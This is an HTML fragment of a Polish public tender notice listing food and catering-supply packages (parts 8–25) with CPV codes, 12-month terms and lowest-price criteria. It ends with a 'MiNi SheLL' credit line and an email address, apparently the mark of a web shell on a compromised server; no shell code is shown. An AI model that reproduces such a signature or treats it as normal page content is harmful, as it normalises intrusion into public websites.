<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Herbata expresowa  Lipton Yellow op. 100 torebek x 2g
Herbata expresowa  Lipton  op. 25 torebek x 2g 
Lipton owocowe exp. 20 torebek
Saga exp. 20 torebek
Saga owoc. Exp. 25 torebek
Herbaty exp. typu Dilmah  w kopertach różne smaki
Herbata exp. 20 torebek typu Minutka, Posti
Herbata exp. typu grzaniec 10 torebek
Herbata owoc. Vitax exp. ~20 ÷ 25 torebek
Herbata ziołowa  ~20 ÷ 25 torebek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KNORR Gorący Kubek barszcz czerwony 12g
KNORR Gorący Kubek 16÷18g różne smaki (pieczarkowa, pomidorowa, grochowa itp.)
Knorr Nudle 64g różne
Zupy typu chińskie 60÷70g różne smaki
Danie z sosem różne smaki 50-73g
Puree ziemniaczane z dodatkami min. 57g
Kisiel, budyń błyskawiczny ~30g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet nr 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kawa Tchibo Family 100g
Kawa Tchibo Family 250g
Kawa Tchibo rozp. 50g
Kawa Tchibo Mild miel. 250g
Kawa Tchibo Exclus. Miel. 100g
Kawa Tchibo Exclus. Miel. 250g
Nescafe Gold rozp. 100g
 Nescafe Cl. Rozp. 50g
Nescafe Cl. Rozp. 100g
Nescafe Cl. Rozp. 200g
Nescafe Cl. Pal. 2g a 100szt. w op.
Nescafe 2W1 10g
Nescafe 3W1 18g
Mokate Cappuc. 15g
Nescafe Gold rozp. 200g
La Festa Czekolada rozp. 14g
Kawa Tchibo Mild miel. 100g
Jacobs Kronung 250g
Jacobs Kronung 100g
Jacobs Kronung rozp. 50g
Jacobs Kronung rozp. 100g
Jacobs Kronung rozp. 200g
Jacobs Aroma rozp. 100g
Jacobs Cronat Gold 100g mielona
Jacobs Cronat Gold 250g
Jacobs Cronat Gold 500g
Jacobs Cronat Gold rozp. 50g
Jacobs Cronat Gold rozp. 100g
Kawa Maxwell House twarda 250g
Kawa Maxwell House 100g
Maxwell Delikat rozp. 100g
Maxwell House rozp. 100g
Maxwell House rozp. 200g
Kawa miel.typu Woseba 100g
Kawa miel.typu Woseba 250g
Kawa Jacobs 2w1 16g
Kawa Jacobs 3w1 18g
Kawa Jacobs Maxwell House 2w1 18g
Kawa Jacobs Maxwell House 3w1 18g
Nescafe Gold 2g (op.100szt.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet nr 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czekolada mleczna 100g  Wedel
Czekolada gorzka Wedel 100g
Czekolada bakaliowa Wedel 100g
Czekolada z nadz. róż. Wedel 100g
Czekolada biała Wedel 100g
Czekolada różne smaki Wedel 220g
Czekolada Excel mleczna typu Lindt 100g
Bombonierka Thins milk typu Lindt 125g
Czekolada gold różne smaki typu Lindt 300g
Czekolada Merci 100g różne smaki
Czekolada Wawel różne smaki 100g
Wawel Czekolada light mleczna, gorzka 80g
Czekolada Milka 100g różne smaki biała, gorzka, mleczna, nadziewana
Czekolada Milka 200g
Czekolada mleczna Alpen 100g różne smaki
Czekolada Alpen z okienkiem 100g
Czekolada Alpen z okienkiem 220g
Czekolada Alpen 200g 
Czekolada Terravita 100g różne smaki
Czekolada Terravita 250g różne smaki
Lizaki wielosmak. Różne 8÷12g 
Lizaki Chupa-chups mały
Draże w asort. różne smaki 70g
Draże w czekoladzie 80g różne
Halls różne smaki 33,5g
Baton czekoladowy Maciek 47g różne smaki
Baton 3 Bit 41g
Baton 3 Bit XXL 53g
Baton Bounty 57g
Baton czekoladowy Mars 36÷47g 
Baton typu Pierrot, Batony nadziewane różne smaki ~ 35 ÷ 50g
Baton czekoladowy Kit-Kat 46g
Baton Milky Way 21,5g 
Baton Milky Way 43g 
Baton WW 
Baton Pawełek 45÷56g
Lion 41÷46g
Twix 51g
Grześki n/oblewane 28g
Grześki w czekoladzie ~39g
Grześki 20g w czekoladzie
Princessa ~37g różne smaki
Princessa Maxi 49g
Prince Polo XXL 52g
Prince Polo Cl. ~39g
Prince Polo Clasic 20g
Chałwa różne smaki 20g
Chałwa różne smaki 50g
Chałwa różne smaki 100g
Chałwa w czekoladzie 60g
Skittles 45g
Snickers ~51g
Snickers Crun 40g
Snickers Super 75g
Tic-Tak różne smaki 12÷16g
Mentos różne smaki 38g
Guma Mentos b/c 13g
Guma Mamba 27,5g
Guma Winterfresh różne smaki drażetki
Guma Orbit różne smaki listki a 5
Nimm 2 Śmiejżelki 100g
Nimm 2 dropsy 50g
Nimm 2 torebki 90g
Ice Fresh dropsy 50g
Ice Fresh torebki 125g
Kopiko torebki 120g
Kopiko dropsy 40g
Kopiko torba 800g
Żelki różne ~90g
Cukierki ziołowe Verbena 60g
Kinder Chocolate T 8
Kinder Chocolate T 4
Kinder Bueno
Raffaello 30g
Raffaello T 15
Raffaello T 24
Ferrero Rocher 37,5g
Ferrero Rocher 300÷312g
Ferrero Rocher 312g Piramidka, Serce
Merci 250g bombonierka
Merci 400g
Toffifee 125g
Toffifee 400g
Bomboniery typu Kujawianka, Mieszko ~220g
Bomboniery typu Kujawianka, Mieszko ~290÷360g
Bomboniera Czekoladowe Kreacje mix Solidarność 228÷286g
Bomboniery Solidarność L amour różne ~170g
Bomboniery Solidarność L amour różne ~235g
Bomboniera Milka 150g
Baryłki Wedel 200g
Bomb. Pasjonata Wedel różne smaki ~299g
Ptasie Mleczko Wedel 450g
Alpejskie Mleczko 400g
Ptasie Mleczko ~ 400g
Wiśnie w czekol. ~197g
Adwokatki 300g
Adwokatki 180g
Bomboniery świąteczne 120÷180g
Cukierki Kukułki luz.
Cuk. Musujące typ. Zozole mix
Cuk. Mieszanka owocowa luz.
Mieszanka Wedlowska igraszki luz.
Śliwka w czek., Kasztanki, Złote praliny
Wiśnie w czekoladzie luz.
Adwokatki luz.
Czekoladki  luz. Mieszanka typu Marsy, Bounty
Toffee mleczne, śmiet., kaw. luz.
Galaretka w czekoladzie luz.
Galaretka pałka w czekol. luz.
Galaretka blok w cukrze luz.
Ptasie mleczko w czekol. luz.
Trufle w polewie zawij. luz.
Michałki z Hanki w czek. zawij. luz.
Krówka polska mleczna luz.
Mieszanka krakowska luz.
Mleczko otmuchowskie luz.
Cukierki z wit. C luz.
Landyryny owoc. pacz. 90g
Landyryny mięt. pacz. 90g
Ice cool pacz. ~100g
Ice mint pacz. ~100g
Cukierki b c różne smaki ~80g
Kukułki paczkow. ~120g
Cuk. paczkow. zawij. ~100g różne smaki
Karmelki różne smaki ~80g
Kamyki brzeskie 100g
M&M 48g
Ciastka Pieguski 135g
Delicje różne smaki ~147g
Paluszki beskidzkie słone, z makiem, z sezamem 70g
Paluszki Lajkonik 70g
Paluszki Lajkonik 180g
Krakersy  70g
Krakersy 180g
Sucharki b c ~280g
Biszkopty 120g
Herbatniki szkolne ~70g
Herbatniki Be-Be ~16g
Ciastka maślane ~160g
Herbatniki Leibnitz 50g
Herbatniki Leibnitz 100g
Ciastka Petitki 126g
Ciastka Petitki 48g
Ciastka Petitki biszkopty 120g
Ciastka Petitki zboża 300g
Markizy 175g
Jeżyki 140g
Wafle Familijne 180g
Wafle śmietankowe, kokosowe, kakaowe ~180g
Wafle light 70g
Ciastka deser. różne ~170g
Ciastka b c 125g
Pierniki alpejskie 160g
Pierniki nadziewane ~165g
Precelki ~130g
Sezamki ciastka
Wafle różne smaki luz.
Ciastka w czekoladzie luz.
Pierniki lukrowane luz.
Ciastka kruche luz
Ciastka kruche obl. czekol.
Ciastka karpatka luz.
Talarki krakowskie 170g
Ciastka Petitki 85g
Rogal 7 Days 60g
Rogal 7 Days 80g
Herbatniki maślane z cukrem szkolne luz.
Pieczywo typu Waza żytnie, pszenne ~140g
Ciastka maślane 
Pałeczki w polewie
Słomka ptysiowa luz.
Rurka z nadzieniem luz.
Rurka pusta luz.
Krakersy mix luz.
Ciastka biszkoptowe oblew. Czekoladą luz.
Pierniki nadziewane luz.
Pieczywo ryżowe różne smaki 100÷130g
Gofry bugajskie różne
Słonecznik z przyprawami 100g
Słodzik op. 100 tabl.
Ciastka dekorowane.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet nr 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aronia mrożona
Truskawka mrożona
Brokuły mrożone
Szpinak rozdrobniony mrożony
Fasolka szparagowa mrożona
Brukselka mrożona
Marchewka mrożona kostka
Groszek zielony mrożony
Papryka czerwona mrożona
Mieszanka kompotowa
Włoszczyzna 3 - składnikowa paski mrożona: marchew, pietruszka, seler
Mieszanka warzywna            5 - składnikowa mrożona
Frytka MR. op. 2,5kg
Flaki MR. Blanszowane op. 900g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet nr 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sos do hamburgerów but. 1 L 
Ketchup łagodny  but. 1kg
Musztarda gastronomiczna but. 1kg
Cebula smażona op. 0,5kg
Cukier saszetka 5g pak. a 500 szt.
Sok cytrynowy do herbaty ~10g pak. a 10 szt.
Sałatka hamburgerowa poj. ~900 ml
Sałatka obiadowa poj. ~900 ml.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet nr 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pasztet mix 130g
Boczek mielony ~130 ÷ 156g foremka
Golonka ~110g foremka
Smalec z mięsem ~125g foremka
Pasztet drobiowy zwykły i z dodatkami 90g
Szynka, polędwica drobiowa 110÷125g
Szynka mielona ~110g
Wiejski przysmak ~147g
Konserwa turystyczna ~130g
Gulasz angielski ~125g
Szynka Polska wiejska delikatesowa ~125g
Konserwa tyrolska ~130g
Śledź w oleju z otwieraczem 170 ÷ 180g
Sałatka z makreli 125 ÷ 160g
Paprykarz 125 ÷ 156g foremka
Filety śledziowe w oleju, w sosach różnych 170g z otwieraczem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet nr 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Woda mineralna zwykła 1,5 l n/g 
Woda mineralna zwykła 1,5 l gaz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet nr 16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cisowianka woda 0,5 l gaz
Cisowianka woda 0,5 l n/g
Cisowianka woda sport 0,7 l
Cisowianka woda 1,5 l gaz
Cisowianka woda 1,5 l n/g
Nałęczowianka woda smakowa 1,5 l n/g
Woda Nałęczowianka gaz.  0,5 l
Woda Nałęczowianka n/g  0,5 l
Woda Nałęczowianka n/g  1,5 l
Woda Nałęczowianka gaz.  1,5 l
Woda Nałęczow. Sprint  n/g    0,75 l
Woda Muszynianka  1,5 l
Woda Muszynianka 0,6 l
Woda Żywiec n/g  1,5 l
Woda Żywiec gaz.  1,5 l
Żywiec woda smakowa n/g  1,5 l
Ustronianka woda gaz 1,5l
Ustronianka woda n/g 1,5l
Ustronianka z jodem 1,5 l
Kuracjusz 5 l
Woda Słowianka 0,5 l gaz
Woda Słowianka 0,5 l n/g
Woda Słowianka 1,5 l n/g
Woda Słowianka 1,5 l gaz
Woda Słowianka 1,5 l n/g smakowa
Woda Mama i ja 1,5 l n/g
Woda Mama i ja 0,5 l n/g sportcup
Woda Mama i ja 0,5 l n/g 
Napój energetyzujący 1 l
Napój izotoniczny 0,5 l
Napoje owocowe różne smaki 0,5 l
Napoje w kartonach 0,2 l
Napoje owocowe różne smaki 1,5 l
Napoje typu oranżada różne smaki 1,5 l
Napoje różne smaki 2 l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet nr 17.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tarczyn 0,3 l Sok różne smaki 
Tarczyn 0,3 l Nektar różne smaki 
Tymbark 0,25 l Napój różne smaki 
Tymbark aseptic 0,5 l napoje różne smaki
Tymbark karton 1 l Napój różne smaki
Tymbark karton 1 l Sok różne smaki
Tymbark 0,25 l Owal Sok różne smaki
Tymbark 0,25 l Owal Sok pomidorowy
Tymbark 0,25 l Owal Sok pomidorowy pikantny
Hortex 1 l Sok różne smaki
Hortex 1 l Sok jabłkowy
Hortex 1 l Sok pomidorowy
Hortex 1 l Napój różne smaki
Hortex 1 l Nektar różne smaki
Hortex Light różne smaki  1 l
Fortuna Sok różne smaki  1 l
Fortuna Sok Jabłkowy  1 l
Fortuna Nektar różne smaki 1L
Kubuś sok różne smaki  ~0,3 l
Kubuś Sok różne smaki  1 l
Soki 100% różne smaki w kartonikach 0,2 l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet nr 18.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Flaczarka biała 500 ml
Kubek przezroczysty 200ml
Talerz niedzielony
Łyżka duża biała
Łyżeczka biała
Tacki tekturowe 140x200 op. 500 szt.
Reklamówki HDPE 8 op.200 szt. 27/7/48
Folia spożywcza 45 250m szt.
Reklamówka HDPE na rolce 5 24x6x44 op. 200szt.
Reklamówka kolorowa 40x45 cm
Serwetki gastronomiczne 15x15 a 500
Torba papierowa 220x110x250
Taśma do metkowania kolor
Pojemnik zamykany 240x173x33
Pojemnik zamykany 268x211x32
Nóż
Widelec
Mieszadełko
Koperta frytki 100g (op. 200 szt.)
Koperta frytki 200g (op. 200 szt.)
Koperta hamburger mała (op. 200 szt.)
Koperta hot-dog (op. 200 szt.)
Woreczki 18/4/35 op.1000
Woreczki 14/4/26 op.1000
Woreczki 10/4/32 op.1000
Woreczki 14/4/35 op.1000
Kubek 250ml styropianowy
Filiżanka brązowa-biała 200ml
Menu box niedzielony
Tacki tekturowe 140x250 op. 500 szt.
Papier do pieczenia 5kg
Serwetki ażurowe 32 cm (op. 100 szt.)
Serwetki ażurowe 40x20 cm (op. 100 szt.)
Folia aluminiowa ~150 m
Rurki kolorowe - słomki (op. 1000 szt.)
Widelczyk do frytek
Koperta hamburger duża 200 szt.
Papier do pakowania ryza 40/60 (10 kg)
Rolka do kasy fiskalnej termoczuła 28mm/30m
Woreczki 10/22 op 1000szt.
Pojemnik 108x82x42
Pojemnik 108x82x64
Wieczko do pojemnika.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.21.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet nr 19.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Marchew korzeń
Burak czerwony
Pietruszka korzeń
Seler korzeń
Kapusta biała (główka)
Kapusta czerwona (główka)
Kapusta pekińska (główka)
Kapusta brukselka
Cebula zaschnięta
Czosnek krajowy, średnica ok.. 3cm
Pietruszka zielona: okres letni, pęczek nie mniej niż 100g
Pietruszka zielona: okres zimowy, pęczek nie mniej niż 50g
Koperek: okres letni, pęczek nie mniej niż 70g
Koperek: okres zimowy, pęczek nie mniej niż 35g
Por wczesny ok. 150÷200g sztuka
Marchew młoda obcinana
Seler z nacią pęczki
Seler obcinany młody
Buraki młode
Por 
Kapusta biała wczesna średnica ~15 cm
Kapusta czerwona wczesna średnica ~15 cm
Cebula młoda (nie zaschnięta
Pomidory
Ogórek zielony świeży
Ogórek szklarniowy
Papryka żółta, zielona
Papryka czerwona
Kabaczek/cukinia
Kalafior średnica ~15 cm
Brokuły średnica ~15 cm
Fasolka szparagowa
Botwina pęczek ok. 5 szt.
Kalarepka średnica 7÷8 cm
Fasolka szparagowa zielona
Rzodkiewka, pęczek nie mniej niż 10 szt.
Sałata zielona główka
Szczypiorek, pęczek nie mniej niż 70g
Ogórek kiszony
Kapusta kiszona.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet nr 20.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki jadalne późne workowane 25 kg
Ziemniaki jadalne wczesne workowane 25 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet nr 21.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jura Sport n/g  0,5 l
Woda Jurajska gaz.  1,5 l
Woda Jurajska n/g  1,5 l
Woda Jurajska gaz  0,5 l
Woda Jurajska n/g 0,5 l
Woda Jurajska lekko-gazowana  1,5 l
Woda Jurajska gaz  0,5 l ze smakiem Limonki, Pomarańczy, Jabłka, Truskawki
Woda Jurajska gaz  1,5 l ze smakiem Limonki, Pomarańczy, Jabłka, Cytryny, Truskawki
Woda Jurajska n/g  0,5 l ze smakiem Poziomki, Cytryny, Grapefruit
Woda Jurajska n/g  1,5 l ze smakiem Poziomki, Cytryny, Grapefruit, Truskawki
Frutek Aqua n/g smakowy 0,5 l
Napoje Frutek 0,33 l z zamknięciem typu sport-cap
Jurajska napoje gazowane 0,5 l różne smaki
Jurajska napoje gazowane 1,5 l różne smaki
Tonik 0,5 l różne smaki
Tonik 1,5 l różne smaki
Napoje niegazowane z ekstraktem Herbaty Ice Tea 0,5 l
Napoje niegazowane z ekstraktem Herbaty Ice Tea 1,5 l
Cola 2 l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pakiet nr 22.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pieczarka świeża luz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Pakiet nr 23.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jabłka ekstra kl. I
Truskawka
Śliwka węgierka
Jabłka  kl. II.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Pakiet nr 24.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sok marchwiowy  ~250 ml*
Sok jabłkowy  ~250 ml*
Soki wielowarzywne ~250 ml* 
Sok warzywno-owocowy ~250 ml
Sok z owoców egzotycznych ~250 ml
Sok marchwiowy 500 ml
*Możliwość zwrotu nie sprzedanych soków.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Pakiet nr 25.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lody różne smaki ~ 90 ml typu: Koral, Zielona Budka, Algida i inne
Lody różne smaki ~ 110 ml typu: Koral, Zielona Budka, Algida i inne
Lody różne smaki ~ 220 ml typu: Koral, Zielona Budka, Algida i inne
Lody różne smaki ~ 300 ml typu: Koral, Zielona Budka, Algida i inne
Torty i Rolady lodowe ~1000 ml.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com